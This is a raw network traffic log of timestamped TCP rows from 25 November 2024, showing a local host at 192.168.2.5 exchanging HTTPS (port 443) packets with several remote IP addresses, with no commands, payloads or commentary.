Nov 25, 2024 11:34:06.268254995 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.268337011 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.268476963 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.315344095 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.321841002 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.321850061 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.345622063 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.345658064 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.345668077 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.345695972 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.345721960 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.345746994 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.345771074 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.345786095 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.345860004 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.357666016 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.357693911 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.357703924 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.357729912 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.357757092 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.357781887 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.357795000 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.357821941 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.357861996 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.372003078 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.375458002 CET	443	49907	23.200.0.6	192.168.2.5
Nov 25, 2024 11:34:06.383847952 CET	49916	443	192.168.2.5	23.44.201.35
Nov 25, 2024 11:34:06.383847952 CET	49913	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.384006023 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:06.390122890 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.390197992 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.390219927 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.390259027 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.390278101 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.390296936 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.390300989 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.390311956 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.390326977 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.390358925 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.390431881 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.391108990 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.392298937 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.392312050 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.392792940 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.392996073 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.393004894 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.393320084 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.393445015 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.393703938 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.393760920 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.393954992 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.393959999 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.398943901 CET	443	49917	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:06.401096106 CET	49917	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:06.401096106 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:06.401115894 CET	443	49917	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:06.401138067 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:06.402137041 CET	443	49917	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:06.402240992 CET	49917	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:06.402240992 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:06.402817011 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:06.402827024 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:06.404000044 CET	49917	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:06.404058933 CET	443	49917	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:06.408654928 CET	443	49907	23.200.0.6	192.168.2.5
Nov 25, 2024 11:34:06.408683062 CET	443	49907	23.200.0.6	192.168.2.5
Nov 25, 2024 11:34:06.408720970 CET	443	49907	23.200.0.6	192.168.2.5
Nov 25, 2024 11:34:06.408775091 CET	49907	443	192.168.2.5	23.200.0.6
Nov 25, 2024 11:34:06.408775091 CET	49907	443	192.168.2.5	23.200.0.6
Nov 25, 2024 11:34:06.408826113 CET	443	49907	23.200.0.6	192.168.2.5
Nov 25, 2024 11:34:06.408866882 CET	49907	443	192.168.2.5	23.200.0.6
Nov 25, 2024 11:34:06.408868074 CET	443	49907	23.200.0.6	192.168.2.5
Nov 25, 2024 11:34:06.409373045 CET	49907	443	192.168.2.5	23.200.0.6
Nov 25, 2024 11:34:06.409394026 CET	443	49907	23.200.0.6	192.168.2.5
Nov 25, 2024 11:34:06.409425020 CET	49907	443	192.168.2.5	23.200.0.6
Nov 25, 2024 11:34:06.424046993 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.424072981 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.424081087 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.424102068 CET	443	49915	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:06.424124002 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.424138069 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.424160004 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.424190044 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.424213886 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.424226046 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.424226046 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.424242020 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.424313068 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.424782991 CET	49915	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:06.424792051 CET	443	49915	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:06.425793886 CET	443	49915	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:06.425983906 CET	49915	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:06.426934958 CET	49915	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:06.426996946 CET	443	49915	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:06.437463999 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.437514067 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.437552929 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.437562943 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.437788963 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.448388100 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.448497057 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.448506117 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.454483032 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.454490900 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.454807997 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.454816103 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.460880041 CET	49917	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:06.460886955 CET	443	49917	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:06.476174116 CET	49915	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:06.476181030 CET	443	49915	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:06.488670111 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:06.489113092 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:06.489547014 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:06.489551067 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:06.490712881 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.490737915 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.490848064 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.490848064 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.490864038 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.491498947 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:06.491503000 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:06.491852999 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.491858006 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.491858006 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.502501011 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.502512932 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.502532959 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.502542973 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.502624989 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.502624989 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.502636909 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.504085064 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.505858898 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.505867004 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.505881071 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.505913019 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.505951881 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.505960941 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.505986929 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.507728100 CET	49917	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:06.510503054 CET	443	49914	204.79.197.237	192.168.2.5
Nov 25, 2024 11:34:06.510766983 CET	49914	443	192.168.2.5	204.79.197.237
Nov 25, 2024 11:34:06.510776043 CET	443	49914	204.79.197.237	192.168.2.5
Nov 25, 2024 11:34:06.511112928 CET	443	49914	204.79.197.237	192.168.2.5
Nov 25, 2024 11:34:06.511413097 CET	49914	443	192.168.2.5	204.79.197.237
Nov 25, 2024 11:34:06.511782885 CET	443	49914	204.79.197.237	192.168.2.5
Nov 25, 2024 11:34:06.511936903 CET	49914	443	192.168.2.5	204.79.197.237
Nov 25, 2024 11:34:06.513092995 CET	49914	443	192.168.2.5	204.79.197.237
Nov 25, 2024 11:34:06.513166904 CET	443	49914	204.79.197.237	192.168.2.5
Nov 25, 2024 11:34:06.524007082 CET	49915	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:06.538418055 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.538469076 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.538491011 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.538511038 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.538512945 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.538558006 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.538592100 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.546794891 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.546807051 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.546977997 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.546988010 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.549720049 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.549757004 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.549854040 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.549854040 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.549876928 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.560007095 CET	49914	443	192.168.2.5	204.79.197.237
Nov 25, 2024 11:34:06.560024023 CET	443	49914	204.79.197.237	192.168.2.5
Nov 25, 2024 11:34:06.562026978 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.562134981 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.562144041 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.587909937 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.587933064 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.588007927 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.588016987 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.588042021 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.588192940 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.588243008 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.588280916 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.588279009 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.588300943 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.588314056 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.588382959 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.588387966 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.592067957 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.608001947 CET	49914	443	192.168.2.5	204.79.197.237
Nov 25, 2024 11:34:06.611031055 CET	443	49908	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.611176014 CET	443	49910	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.612001896 CET	49908	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.612016916 CET	443	49908	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.612306118 CET	49908	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.612310886 CET	443	49908	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.612912893 CET	49910	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.612912893 CET	49910	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.612927914 CET	443	49910	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.612935066 CET	443	49910	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.615603924 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.615634918 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.615714073 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.615714073 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.615726948 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.616236925 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.616327047 CET	443	49911	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.617292881 CET	49911	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.617292881 CET	49911	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.617332935 CET	443	49911	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.617371082 CET	443	49911	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.624476910 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.624578953 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.624592066 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.634550095 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.634593964 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.634638071 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.634646893 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.634696960 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.634696960 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.634704113 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.634839058 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.635040045 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.636002064 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.636017084 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.657402039 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.657426119 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.657481909 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.657497883 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.657520056 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.660151958 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.660161018 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.660177946 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.660186052 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.660213947 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.660223007 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.660270929 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.671674967 CET	443	49909	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.672679901 CET	49909	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.672679901 CET	49909	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.672722101 CET	443	49909	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.672744989 CET	443	49909	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.676570892 CET	443	49919	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.678448915 CET	49919	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.678448915 CET	49919	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.678464890 CET	443	49919	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.678473949 CET	443	49919	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.682060003 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.682077885 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.682276964 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.682293892 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.686804056 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.686813116 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.686849117 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.686880112 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.686882973 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.686898947 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.686947107 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.686947107 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.686953068 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.686971903 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.686975002 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.687232971 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.691713095 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.691744089 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.691791058 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.691828012 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.691828012 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.691832066 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.691876888 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.691907883 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.691907883 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.704277039 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.704293013 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.704324007 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.704358101 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.704376936 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.704397917 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.708431005 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.708447933 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.708462000 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.708471060 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.708544970 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.708544970 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.708554983 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.721628904 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.721652031 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.721689939 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.721724987 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.721740961 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.721745968 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.721771955 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.721791029 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.721817970 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.721823931 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.721890926 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.740108013 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.740130901 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.740171909 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.740190983 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.740232944 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.740243912 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.740257978 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.740257978 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.750766039 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.750811100 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.750830889 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.750855923 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.750871897 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.750885963 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.750893116 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.750924110 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.750924110 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.750957012 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.751207113 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.758250952 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.827811956 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.827821016 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.827841043 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.827848911 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.827914000 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.827914000 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.827924967 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.829791069 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.829799891 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.829834938 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.829849005 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.829869986 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.829886913 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.829911947 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.829982996 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.840075016 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.840084076 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.840234041 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.840243101 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.853658915 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.853667021 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.853696108 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.853703976 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.853709936 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.853734016 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.853740931 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.853780031 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.853809118 CET	49902	443	192.168.2.5	23.209.72.7
